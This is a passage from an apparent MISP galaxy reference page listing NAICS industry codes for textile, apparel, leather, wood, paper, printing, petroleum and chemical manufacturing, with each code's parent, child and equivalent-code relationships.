  • parent-of: misp-galaxy:naics="313310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="313320" with estimative-language:likelihood-probability="likely"

31331

Textile and Fabric Finishing Mills

The tag is: misp-galaxy:naics="31331"

31331 has relationships with:

  • child-of: misp-galaxy:naics="3133" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="313310" with estimative-language:likelihood-probability="likely"

313310

Textile and Fabric Finishing Mills

The tag is: misp-galaxy:naics="313310"

313310 has relationships with:

  • child-of: misp-galaxy:naics="3133" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31331" with estimative-language:likelihood-probability="likely"

31332

Fabric Coating Mills

The tag is: misp-galaxy:naics="31332"

31332 has relationships with:

  • child-of: misp-galaxy:naics="3133" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="313320" with estimative-language:likelihood-probability="likely"

313320

Fabric Coating Mills

The tag is: misp-galaxy:naics="313320"

313320 has relationships with:

  • child-of: misp-galaxy:naics="3133" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31332" with estimative-language:likelihood-probability="likely"

314

Textile Product Mills

The tag is: misp-galaxy:naics="314"

314 has relationships with:

  • parent-of: misp-galaxy:naics="3141" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3149" with estimative-language:likelihood-probability="likely"

3141

Textile Furnishings Mills

The tag is: misp-galaxy:naics="3141"

3141 has relationships with:

  • child-of: misp-galaxy:naics="314" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="314110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="314120" with estimative-language:likelihood-probability="likely"

31411

Carpet and Rug Mills

The tag is: misp-galaxy:naics="31411"

31411 has relationships with:

  • child-of: misp-galaxy:naics="3141" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="314110" with estimative-language:likelihood-probability="likely"

314110

Carpet and Rug Mills

The tag is: misp-galaxy:naics="314110"

314110 has relationships with:

  • child-of: misp-galaxy:naics="3141" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31411" with estimative-language:likelihood-probability="likely"

31412

Curtain and Linen Mills

The tag is: misp-galaxy:naics="31412"

31412 has relationships with:

  • child-of: misp-galaxy:naics="3141" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="314120" with estimative-language:likelihood-probability="likely"

314120

Curtain and Linen Mills

The tag is: misp-galaxy:naics="314120"

314120 has relationships with:

  • child-of: misp-galaxy:naics="3141" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31412" with estimative-language:likelihood-probability="likely"

3149

Other Textile Product Mills

The tag is: misp-galaxy:naics="3149"

3149 has relationships with:

  • child-of: misp-galaxy:naics="314" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31491" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="314910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31499" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="314994" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="314999" with estimative-language:likelihood-probability="likely"

31491

Textile Bag and Canvas Mills

The tag is: misp-galaxy:naics="31491"

31491 has relationships with:

  • child-of: misp-galaxy:naics="3149" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="314910" with estimative-language:likelihood-probability="likely"

314910

Textile Bag and Canvas Mills

The tag is: misp-galaxy:naics="314910"

314910 has relationships with:

  • child-of: misp-galaxy:naics="3149" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31491" with estimative-language:likelihood-probability="likely"

31499

All Other Textile Product Mills

The tag is: misp-galaxy:naics="31499"

31499 has relationships with:

  • child-of: misp-galaxy:naics="3149" with estimative-language:likelihood-probability="likely"

314994

Rope, Cordage, Twine, Tire Cord, and Tire Fabric Mills

The tag is: misp-galaxy:naics="314994"

314994 has relationships with:

  • child-of: misp-galaxy:naics="3149" with estimative-language:likelihood-probability="likely"

314999

All Other Miscellaneous Textile Product Mills

The tag is: misp-galaxy:naics="314999"

314999 has relationships with:

  • child-of: misp-galaxy:naics="3149" with estimative-language:likelihood-probability="likely"

315

Apparel Manufacturing

The tag is: misp-galaxy:naics="315"

315 has relationships with:

  • parent-of: misp-galaxy:naics="3151" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3152" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3159" with estimative-language:likelihood-probability="likely"

3151

Apparel Knitting Mills

The tag is: misp-galaxy:naics="3151"

3151 has relationships with:

  • child-of: misp-galaxy:naics="315" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="315120" with estimative-language:likelihood-probability="likely"

31512

Apparel Knitting Mills

The tag is: misp-galaxy:naics="31512"

31512 has relationships with:

  • child-of: misp-galaxy:naics="3151" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="315120" with estimative-language:likelihood-probability="likely"

315120

Apparel Knitting Mills

The tag is: misp-galaxy:naics="315120"

315120 has relationships with:

  • child-of: misp-galaxy:naics="3151" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31512" with estimative-language:likelihood-probability="likely"

3152

Cut and Sew Apparel Manufacturing

The tag is: misp-galaxy:naics="3152"

3152 has relationships with:

  • child-of: misp-galaxy:naics="315" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31521" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="315210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31525" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="315250" with estimative-language:likelihood-probability="likely"

31521

Cut and Sew Apparel Contractors

The tag is: misp-galaxy:naics="31521"

31521 has relationships with:

  • child-of: misp-galaxy:naics="3152" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="315210" with estimative-language:likelihood-probability="likely"

315210

Cut and Sew Apparel Contractors

The tag is: misp-galaxy:naics="315210"

315210 has relationships with:

  • child-of: misp-galaxy:naics="3152" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31521" with estimative-language:likelihood-probability="likely"

31525

Cut and Sew Apparel Manufacturing (except Contractors)

The tag is: misp-galaxy:naics="31525"

31525 has relationships with:

  • child-of: misp-galaxy:naics="3152" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="315250" with estimative-language:likelihood-probability="likely"

315250

Cut and Sew Apparel Manufacturing (except Contractors)

The tag is: misp-galaxy:naics="315250"

315250 has relationships with:

  • child-of: misp-galaxy:naics="3152" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31525" with estimative-language:likelihood-probability="likely"

3159

Apparel Accessories and Other Apparel Manufacturing

The tag is: misp-galaxy:naics="3159"

3159 has relationships with:

  • child-of: misp-galaxy:naics="315" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31599" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="315990" with estimative-language:likelihood-probability="likely"

31599

Apparel Accessories and Other Apparel Manufacturing

The tag is: misp-galaxy:naics="31599"

31599 has relationships with:

  • child-of: misp-galaxy:naics="3159" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="315990" with estimative-language:likelihood-probability="likely"

315990

Apparel Accessories and Other Apparel Manufacturing

The tag is: misp-galaxy:naics="315990"

315990 has relationships with:

  • child-of: misp-galaxy:naics="3159" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31599" with estimative-language:likelihood-probability="likely"

316

Leather and Allied Product Manufacturing

The tag is: misp-galaxy:naics="316"

316 has relationships with:

  • parent-of: misp-galaxy:naics="3161" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3162" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3169" with estimative-language:likelihood-probability="likely"

3161

Leather and Hide Tanning and Finishing

The tag is: misp-galaxy:naics="3161"

3161 has relationships with:

  • child-of: misp-galaxy:naics="316" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="316110" with estimative-language:likelihood-probability="likely"

31611

Leather and Hide Tanning and Finishing

The tag is: misp-galaxy:naics="31611"

31611 has relationships with:

  • child-of: misp-galaxy:naics="3161" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="316110" with estimative-language:likelihood-probability="likely"

316110

Leather and Hide Tanning and Finishing

The tag is: misp-galaxy:naics="316110"

316110 has relationships with:

  • child-of: misp-galaxy:naics="3161" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31611" with estimative-language:likelihood-probability="likely"

3162

Footwear Manufacturing

The tag is: misp-galaxy:naics="3162"

3162 has relationships with:

  • child-of: misp-galaxy:naics="316" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="316210" with estimative-language:likelihood-probability="likely"

31621

Footwear Manufacturing

The tag is: misp-galaxy:naics="31621"

31621 has relationships with:

  • child-of: misp-galaxy:naics="3162" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="316210" with estimative-language:likelihood-probability="likely"

316210

Footwear Manufacturing

The tag is: misp-galaxy:naics="316210"

316210 has relationships with:

  • child-of: misp-galaxy:naics="3162" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31621" with estimative-language:likelihood-probability="likely"

3169

Other Leather and Allied Product Manufacturing

The tag is: misp-galaxy:naics="3169"

3169 has relationships with:

  • child-of: misp-galaxy:naics="316" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31699" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="316990" with estimative-language:likelihood-probability="likely"

31699

Other Leather and Allied Product Manufacturing

The tag is: misp-galaxy:naics="31699"

31699 has relationships with:

  • child-of: misp-galaxy:naics="3169" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="316990" with estimative-language:likelihood-probability="likely"

316990

Other Leather and Allied Product Manufacturing

The tag is: misp-galaxy:naics="316990"

316990 has relationships with:

  • child-of: misp-galaxy:naics="3169" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31699" with estimative-language:likelihood-probability="likely"

321

Wood Product Manufacturing

The tag is: misp-galaxy:naics="321"

321 has relationships with:

  • parent-of: misp-galaxy:naics="3211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3219" with estimative-language:likelihood-probability="likely"

3211

Sawmills and Wood Preservation

The tag is: misp-galaxy:naics="3211"

3211 has relationships with:

  • child-of: misp-galaxy:naics="321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321114" with estimative-language:likelihood-probability="likely"

32111

Sawmills and Wood Preservation

The tag is: misp-galaxy:naics="32111"

32111 has relationships with:

  • child-of: misp-galaxy:naics="3211" with estimative-language:likelihood-probability="likely"

321113

Sawmills

The tag is: misp-galaxy:naics="321113"

321113 has relationships with:

  • child-of: misp-galaxy:naics="3211" with estimative-language:likelihood-probability="likely"

321114

Wood Preservation

The tag is: misp-galaxy:naics="321114"

321114 has relationships with:

  • child-of: misp-galaxy:naics="3211" with estimative-language:likelihood-probability="likely"

3212

Veneer, Plywood, and Engineered Wood Product Manufacturing

The tag is: misp-galaxy:naics="3212"

3212 has relationships with:

  • child-of: misp-galaxy:naics="321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321215" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321219" with estimative-language:likelihood-probability="likely"

32121

Veneer, Plywood, and Engineered Wood Product Manufacturing

The tag is: misp-galaxy:naics="32121"

32121 has relationships with:

  • child-of: misp-galaxy:naics="3212" with estimative-language:likelihood-probability="likely"

321211

Hardwood Veneer and Plywood Manufacturing

The tag is: misp-galaxy:naics="321211"

321211 has relationships with:

  • child-of: misp-galaxy:naics="3212" with estimative-language:likelihood-probability="likely"

321212

Softwood Veneer and Plywood Manufacturing

The tag is: misp-galaxy:naics="321212"

321212 has relationships with:

  • child-of: misp-galaxy:naics="3212" with estimative-language:likelihood-probability="likely"

321215

Engineered Wood Member Manufacturing

The tag is: misp-galaxy:naics="321215"

321215 has relationships with:

  • child-of: misp-galaxy:naics="3212" with estimative-language:likelihood-probability="likely"

321219

Reconstituted Wood Product Manufacturing

The tag is: misp-galaxy:naics="321219"

321219 has relationships with:

  • child-of: misp-galaxy:naics="3212" with estimative-language:likelihood-probability="likely"

3219

Other Wood Product Manufacturing

The tag is: misp-galaxy:naics="3219"

3219 has relationships with:

  • child-of: misp-galaxy:naics="321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321911" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321912" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321918" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32192" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32199" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321992" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321999" with estimative-language:likelihood-probability="likely"

32191

Millwork

The tag is: misp-galaxy:naics="32191"

32191 has relationships with:

  • child-of: misp-galaxy:naics="3219" with estimative-language:likelihood-probability="likely"

321911

Wood Window and Door Manufacturing

The tag is: misp-galaxy:naics="321911"

321911 has relationships with:

  • child-of: misp-galaxy:naics="3219" with estimative-language:likelihood-probability="likely"

321912

Cut Stock, Resawing Lumber, and Planing

The tag is: misp-galaxy:naics="321912"

321912 has relationships with:

  • child-of: misp-galaxy:naics="3219" with estimative-language:likelihood-probability="likely"

321918

Other Millwork (including Flooring)

The tag is: misp-galaxy:naics="321918"

321918 has relationships with:

  • child-of: misp-galaxy:naics="3219" with estimative-language:likelihood-probability="likely"

32192

Wood Container and Pallet Manufacturing

The tag is: misp-galaxy:naics="32192"

32192 has relationships with:

  • child-of: misp-galaxy:naics="3219" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="321920" with estimative-language:likelihood-probability="likely"

321920

Wood Container and Pallet Manufacturing

The tag is: misp-galaxy:naics="321920"

321920 has relationships with:

  • child-of: misp-galaxy:naics="3219" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32192" with estimative-language:likelihood-probability="likely"

32199

All Other Wood Product Manufacturing

The tag is: misp-galaxy:naics="32199"

32199 has relationships with:

  • child-of: misp-galaxy:naics="3219" with estimative-language:likelihood-probability="likely"

321991

Manufactured Home (Mobile Home) Manufacturing

The tag is: misp-galaxy:naics="321991"

321991 has relationships with:

  • child-of: misp-galaxy:naics="3219" with estimative-language:likelihood-probability="likely"

321992

Prefabricated Wood Building Manufacturing

The tag is: misp-galaxy:naics="321992"

321992 has relationships with:

  • child-of: misp-galaxy:naics="3219" with estimative-language:likelihood-probability="likely"

321999

All Other Miscellaneous Wood Product Manufacturing

The tag is: misp-galaxy:naics="321999"

321999 has relationships with:

  • child-of: misp-galaxy:naics="3219" with estimative-language:likelihood-probability="likely"

322

Paper Manufacturing

The tag is: misp-galaxy:naics="322"

322 has relationships with:

  • parent-of: misp-galaxy:naics="3221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

3221

Pulp, Paper, and Paperboard Mills

The tag is: misp-galaxy:naics="3221"

3221 has relationships with:

  • child-of: misp-galaxy:naics="322" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="322110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="322120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="322130" with estimative-language:likelihood-probability="likely"

32211

Pulp Mills

The tag is: misp-galaxy:naics="32211"

32211 has relationships with:

  • child-of: misp-galaxy:naics="3221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="322110" with estimative-language:likelihood-probability="likely"

322110

Pulp Mills

The tag is: misp-galaxy:naics="322110"

322110 has relationships with:

  • child-of: misp-galaxy:naics="3221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32211" with estimative-language:likelihood-probability="likely"

32212

Paper Mills

The tag is: misp-galaxy:naics="32212"

32212 has relationships with:

  • child-of: misp-galaxy:naics="3221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="322120" with estimative-language:likelihood-probability="likely"

322120

Paper Mills

The tag is: misp-galaxy:naics="322120"

322120 has relationships with:

  • child-of: misp-galaxy:naics="3221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32212" with estimative-language:likelihood-probability="likely"

32213

Paperboard Mills

The tag is: misp-galaxy:naics="32213"

32213 has relationships with:

  • child-of: misp-galaxy:naics="3221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="322130" with estimative-language:likelihood-probability="likely"

322130

Paperboard Mills

The tag is: misp-galaxy:naics="322130"

322130 has relationships with:

  • child-of: misp-galaxy:naics="3221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32213" with estimative-language:likelihood-probability="likely"

3222

Converted Paper Product Manufacturing

The tag is: misp-galaxy:naics="3222"

3222 has relationships with:

  • child-of: misp-galaxy:naics="322" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="322211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="322212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="322219" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32222" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="322220" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32223" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="322230" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32229" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="322291" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="322299" with estimative-language:likelihood-probability="likely"

32221

Paperboard Container Manufacturing

The tag is: misp-galaxy:naics="32221"

32221 has relationships with:

  • child-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

322211

Corrugated and Solid Fiber Box Manufacturing

The tag is: misp-galaxy:naics="322211"

322211 has relationships with:

  • child-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

322212

Folding Paperboard Box Manufacturing

The tag is: misp-galaxy:naics="322212"

322212 has relationships with:

  • child-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

322219

Other Paperboard Container Manufacturing

The tag is: misp-galaxy:naics="322219"

322219 has relationships with:

  • child-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

32222

Paper Bag and Coated and Treated Paper Manufacturing

The tag is: misp-galaxy:naics="32222"

32222 has relationships with:

  • child-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="322220" with estimative-language:likelihood-probability="likely"

322220

Paper Bag and Coated and Treated Paper Manufacturing

The tag is: misp-galaxy:naics="322220"

322220 has relationships with:

  • child-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32222" with estimative-language:likelihood-probability="likely"

32223

Stationery Product Manufacturing

The tag is: misp-galaxy:naics="32223"

32223 has relationships with:

  • child-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="322230" with estimative-language:likelihood-probability="likely"

322230

Stationery Product Manufacturing

The tag is: misp-galaxy:naics="322230"

322230 has relationships with:

  • child-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32223" with estimative-language:likelihood-probability="likely"

32229

Other Converted Paper Product Manufacturing

The tag is: misp-galaxy:naics="32229"

32229 has relationships with:

  • child-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

322291

Sanitary Paper Product Manufacturing

The tag is: misp-galaxy:naics="322291"

322291 has relationships with:

  • child-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

322299

All Other Converted Paper Product Manufacturing

The tag is: misp-galaxy:naics="322299"

322299 has relationships with:

  • child-of: misp-galaxy:naics="3222" with estimative-language:likelihood-probability="likely"

323

Printing and Related Support Activities

The tag is: misp-galaxy:naics="323"

323 has relationships with:

  • parent-of: misp-galaxy:naics="3231" with estimative-language:likelihood-probability="likely"

3231

Printing and Related Support Activities

The tag is: misp-galaxy:naics="3231"

3231 has relationships with:

  • child-of: misp-galaxy:naics="323" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="323111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="323113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="323117" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="323120" with estimative-language:likelihood-probability="likely"

32311

Printing

The tag is: misp-galaxy:naics="32311"

32311 has relationships with:

  • child-of: misp-galaxy:naics="3231" with estimative-language:likelihood-probability="likely"

323111

Commercial Printing (except Screen and Books)

The tag is: misp-galaxy:naics="323111"

323111 has relationships with:

  • child-of: misp-galaxy:naics="3231" with estimative-language:likelihood-probability="likely"

323113

Commercial Screen Printing

The tag is: misp-galaxy:naics="323113"

323113 has relationships with:

  • child-of: misp-galaxy:naics="3231" with estimative-language:likelihood-probability="likely"

323117

Books Printing

The tag is: misp-galaxy:naics="323117"

323117 has relationships with:

  • child-of: misp-galaxy:naics="3231" with estimative-language:likelihood-probability="likely"

32312

Support Activities for Printing

The tag is: misp-galaxy:naics="32312"

32312 has relationships with:

  • child-of: misp-galaxy:naics="3231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="323120" with estimative-language:likelihood-probability="likely"

323120

Support Activities for Printing

The tag is: misp-galaxy:naics="323120"

323120 has relationships with:

  • child-of: misp-galaxy:naics="3231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32312" with estimative-language:likelihood-probability="likely"

324

Petroleum and Coal Products Manufacturing

The tag is: misp-galaxy:naics="324"

324 has relationships with:

  • parent-of: misp-galaxy:naics="3241" with estimative-language:likelihood-probability="likely"

3241

Petroleum and Coal Products Manufacturing

The tag is: misp-galaxy:naics="3241"

3241 has relationships with:

  • child-of: misp-galaxy:naics="324" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="324110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="324121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="324122" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32419" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="324191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="324199" with estimative-language:likelihood-probability="likely"

32411

Petroleum Refineries

The tag is: misp-galaxy:naics="32411"

32411 has relationships with:

  • child-of: misp-galaxy:naics="3241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="324110" with estimative-language:likelihood-probability="likely"

324110

Petroleum Refineries

The tag is: misp-galaxy:naics="324110"

324110 has relationships with:

  • child-of: misp-galaxy:naics="3241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32411" with estimative-language:likelihood-probability="likely"

32412

Asphalt Paving, Roofing, and Saturated Materials Manufacturing

The tag is: misp-galaxy:naics="32412"

32412 has relationships with:

  • child-of: misp-galaxy:naics="3241" with estimative-language:likelihood-probability="likely"

324121

Asphalt Paving Mixture and Block Manufacturing

The tag is: misp-galaxy:naics="324121"

324121 has relationships with:

  • child-of: misp-galaxy:naics="3241" with estimative-language:likelihood-probability="likely"

324122

Asphalt Shingle and Coating Materials Manufacturing

The tag is: misp-galaxy:naics="324122"

324122 has relationships with:

  • child-of: misp-galaxy:naics="3241" with estimative-language:likelihood-probability="likely"

32419

Other Petroleum and Coal Products Manufacturing

The tag is: misp-galaxy:naics="32419"

32419 has relationships with:

  • child-of: misp-galaxy:naics="3241" with estimative-language:likelihood-probability="likely"

324191

Petroleum Lubricating Oil and Grease Manufacturing

The tag is: misp-galaxy:naics="324191"

324191 has relationships with:

  • child-of: misp-galaxy:naics="3241" with estimative-language:likelihood-probability="likely"

324199

All Other Petroleum and Coal Products Manufacturing

The tag is: misp-galaxy:naics="324199"

324199 has relationships with:

  • child-of: misp-galaxy:naics="3241" with estimative-language:likelihood-probability="likely"

325

Chemical Manufacturing

The tag is: misp-galaxy:naics="325"

325 has relationships with:

  • parent-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3252" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3253" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3254" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3255" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3256" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3259" with estimative-language:likelihood-probability="likely"

3251

Basic Chemical Manufacturing

The tag is: misp-galaxy:naics="3251"

3251 has relationships with:

  • child-of: misp-galaxy:naics="325" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32518" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325180" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32519" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325193" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325194" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325199" with estimative-language:likelihood-probability="likely"

32511

Petrochemical Manufacturing

The tag is: misp-galaxy:naics="32511"

32511 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="325110" with estimative-language:likelihood-probability="likely"

325110

Petrochemical Manufacturing

The tag is: misp-galaxy:naics="325110"

325110 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32511" with estimative-language:likelihood-probability="likely"

32512

Industrial Gas Manufacturing

The tag is: misp-galaxy:naics="32512"

32512 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="325120" with estimative-language:likelihood-probability="likely"

325120

Industrial Gas Manufacturing

The tag is: misp-galaxy:naics="325120"

325120 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32512" with estimative-language:likelihood-probability="likely"

32513

Synthetic Dye and Pigment Manufacturing

The tag is: misp-galaxy:naics="32513"

32513 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="325130" with estimative-language:likelihood-probability="likely"

325130

Synthetic Dye and Pigment Manufacturing

The tag is: misp-galaxy:naics="325130"

325130 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

